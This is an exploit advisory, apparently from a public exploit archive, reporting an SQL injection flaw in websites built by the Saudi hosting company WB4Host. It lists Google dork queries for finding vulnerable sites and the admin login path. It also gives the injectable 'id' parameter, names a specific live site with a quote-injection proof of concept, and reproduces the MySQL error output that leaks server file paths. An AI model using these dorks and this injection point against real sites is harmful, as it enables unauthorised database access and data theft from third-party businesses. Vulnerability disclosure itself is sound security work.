#################################################################################################
# Exploit Title : WB4Host Saudi Arabia Hosting Company النطاق الواسع للاستضافة SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 10/11/2018
# Vendor Homepage : wb4host.com
# Tested On : Windows and Linux
# Category : WebApps
# Version Information :
# Google Dork :
intext:''النطاق الواسع للاستضافة'' site:sa
intext:''Design & developed by wb4host company'' site:sa
intext:''WB4HOST'' site:sa
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Admin Panel Login Path :
/admin
#################################################################################################
# SQL Injection Exploit :
/en/index.php?content=more_project&id=[SQL Injection]
#################################################################################################
# Example Vulnerable Site =>
[+] fcc.com.sa/en/index.php?content=more_project&id=32%27 => [ Proof of Concept ] => archive.is/8a7fA
#################################################################################################
# SQL Database Error :
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/fcccom/public_html/en/index.php on line 115
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/fcccom/public_html/en/index.php on line 121
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################